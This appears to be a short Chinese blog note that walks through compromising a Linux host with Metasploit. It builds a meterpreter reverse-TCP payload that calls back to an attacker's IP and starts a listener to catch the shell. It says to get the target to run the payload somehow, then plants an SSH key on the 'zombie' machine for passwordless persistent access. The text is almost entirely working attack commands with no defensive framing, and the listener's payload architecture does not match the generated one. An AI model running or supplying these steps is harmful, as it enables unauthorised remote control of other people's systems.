-
生成payload
msfvenom -p linux/x64/meterpreter_reverse_tcp -lhost 攻击机ip -lport 4444 -f elf -o payload
chmod +x payload -
进入msfconsole打开监听
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_tcp
show options
set lhost 攻击机ip
set lport 4444
exploit
-
想办法让目标机器运行payload
-
获取到meterpreter session
bg返回
search linux/manage
use 4
show options
sessions
set session session_id
set username 肉鸡username

使用mv命令将公钥文件拿出来,并改一个短一点的名字
- 测试ssh是否能免密登录
ssh -i 私钥文件路径 username@肉鸡ip
网友评论